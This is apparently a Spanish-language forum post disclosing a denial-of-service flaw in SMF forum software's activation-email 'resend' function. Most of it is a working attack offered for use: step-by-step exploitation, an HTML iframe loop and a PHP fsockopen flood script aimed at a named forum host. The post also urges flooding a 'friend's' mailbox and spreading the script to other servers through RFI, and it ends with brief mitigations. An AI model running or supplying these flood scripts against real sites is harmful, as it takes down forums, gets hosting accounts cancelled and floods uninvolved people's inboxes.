¿De que se trata?Se trata de un bug que permite un DoS, basandose en los mails que envia el servidor en el que esta alojado el foro.
Como explotarloEl servidor objetivo tiene que tener las siguientes caracteristica
s:
· Tener la opcion de activar la cuenta via e-mail habilitada
· Tener la funcion mail habilitada y un servidor smtp
Si el servidor objetivo tiene esas caracteristica
s no habra problema
1.- Registrar un usuario, ojo ¡¡no activar la cuenta!!. El email no tiene porque ser verdadero, de hecho puedes poner uno de un 'amiguito' para petarle el mail.
2.- Extraer el numero de usuario del que has registrado para ello mirar la variable 'u' que hay en su perfil. Por ejemplo:
foro.vzack.com/index.php?action=profile;u=
1 <- hay el numero de usuario seria 1
3.- Ahora simplemente visitamos el link http://[host objetivo]/[foro]/index.php?action=activate;sa=resend;u=[numero de user]
y veremos que nos dice: 'Un nuevo email de activación ha sido enviado satisfactoriam
ente.'
Cada vez que visitemos el link enviara un email y si visitamos muy rapido el link conseguiremos colapsar el server, y en casos extremos que les cancelen la cuenta los administradore
s del host.
Para visitar rapidamente el link podemos fabricar diferentes herramientas
por ejemplo:
En html (poco efectivo ya que envia el referer y es facil que nos paren el ataque :p):
<html>
<script>
for(a=0; a<200; a++){
document.write('<iframe src="http://[host a atacar]/index.php?action=activate;sa=resend;u=[numero de user]" width="1" height="1"</iframe>');
}
</script>
<META HTTP-EQUIV="Refresh" CONTENT="10" />
</html>
En php (nuestro servidor tiene que tener fsockopen activado [los gratuitos no lo tienen activo])
<?php
/* SMF Mail DoS */
/* Visit vZack.com */
$host='foro.vzack.com'; //objetivo
$puerto=80; //puerto
$smfpath='/'; //path del smf
$spam=1; //Userid de alguien pa spamearle xDD
//Fin config
set_time_limit(0);
$get=$smfpath.'index.php?action=activate;sa=resend;u='.$spam;
for($a=0;$a<9999999999999999999999999;$a++){
$flood=@fsockopen($host, $puerto, $errno, $errstr, 5);
fwrite($flood, "GET $get HTTP/1.1\nHost: $host\nConnection: Keep-Alive\n\n");
fwrite($flood, "GET $get HTTP/1.1\nHost: $host\nConnection: Close\n\n");
fclose($flood);
}
?>
Personalmente recomiendo el de php ya que puedes infectar a varios servers mediante RFI
Como evitarloHay varias opciones
1.- Configurar el smf para que no tengan que activar la cuenta los usuarios al registarse:
2.- Configurar el smf para que envie los emails mediante un servidor smtp externo (Por ejemplo gmail), nota: Con esta opcion tambien te pueden cancelar ya que el smf abre una conexion con el smtp remoto.
3.- Desactivar la opcion resend para que no envie el mail de nuevo.
Para ello añadimos este code en la segunda linea del index.php de nuestro smf:
if($_GET['sa'] == 'resend')
exit();
Bug descubierto por mi. Codes para explotarlo by vZor.
Para ver este enlace Registrate o Inicia Sesionhttp://foro.vzack.com
Autor